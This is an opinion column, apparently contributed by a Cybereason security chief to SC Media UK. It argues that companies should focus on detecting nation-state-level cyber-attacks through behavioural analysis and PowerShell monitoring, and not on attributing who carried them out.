Organisations need to identify nation state attacks - but not attackers
Organisations need to identify nation state attacks - but not attackers
Tension on the international stage has reached new heights in recent months. General Sir Nick Carter, the chief of general staff for the British Army, recently went as far as to directly label Russia as the “the most complex and capable security challenge” facing the UK since the Cold War.

General Carter cited cyber-attacks as one of the subtler means now being deployed on the international stage. The National Cyber Security Centre (NCSC), likewise recently highlighted evidence pointing towards Russian cyber-attacks targeting energy networks, telecommunications and media.

One consequence of these fraught international relations is an increased pressure to identify the perpetrator of an attack. It's natural to want to know the culprit behind an incident, and we would never be satisfied with only knowing the “what” and “why” of a conventional crime or act of international aggression without also knowing the “who”.

The challenge of attack attribution 

However, accurately attributing an attack to a specific nation state is extremely challenging. In many cases, particularly in the initial knee-jerk reaction that tends to dominate the headlines, identification is based on circumstantial evidence. Common indicators include the use of code or tactics that have been used in past attacks, as well as the timing and language used.

All of these factors can be easily replicated by an un-associated third party, making it relatively easy to impersonate a specific nation state. This could be done to purposefully frame another nation for political reasons, or simply to deflect investigations. Complicating matters further, nation-state level tools have also become increasingly more available on the dark web. Any fairly competent cyber-criminal can easily acquire advanced malware and techniques and start hacking like a nation state. 

Conversely, it's common practice for nation states to conduct attacks and intelligence operations by hiring third parties. These groups have access to incredibly sophisticated tools and enjoy a degree of protection by the state. The practice creates an extra layer of obfuscation for attributing an attack and provides the state behind it with more deniability. It's almost impossible to gather evidence that can define the difference between a group acting on behalf of a state, and one is simply using similar tools on shared targets. 

Focus on attacks – not attackers

Just because nation state attribution is extremely challenging is not to say that it should not be attempted at all. However, this should firmly remain the concerns of other nation states themselves.

For an enterprise security team to attempt investigate who is behind an attack is extremely complicated and time consuming, and most importantly does very little to improve the organisation's defences against further attack. Determining whether the attack was the work a group working on behalf of North Korea or a single opportunist will make very little difference to the company's defensive posture – assuming they are ever able to go beyond guesswork in the first place. 

However, while the identity of attackers should not be a priority for enterprises, it is an unfortunate reality that most private sector organisations are still potential targets for nation-state level attacks and must work to protect themselves.

Security measures such as reviewing static properties like MD5 hashes of malware files or the domain names of botnet command-and-control servers will not be effective because most advanced tools were designed to evade these defences. Traditional tools such as antivirus and firewalls can rarely protect a company from these threats because it isn't possible to detect advanced attacks just by looking for Indicators of Compromise (IOC). The high-level malware used by nation states is also specifically designed to evade standard incident response, tricking investigators into believing they have identified and shut down a threat.

To stay safe against the threat of nation state attacks, as well as independent criminals adopting their tools and techniques, organisations must change their defensive techniques to focus on behavioural analysis. This will enable them to identify suspicious behaviour across the IT environment that points towards an attack in progress. Organisations also need to monitor the use of scripting programs like PowerShell, which are commonly used to carry out fileless malware attacks which leave no traditional IOC. By focusing on identifying signs of nation state attacks, rather than identifying the attackers themselves, organisations can protect themselves on an increasingly tense national stage. 

Contributed  by Israel Barak, CISO, Cybereason. 

*Note: The views expressed in this blog are those of the author and do not necessarily reflect the views of SC Media UK or Haymarket Media.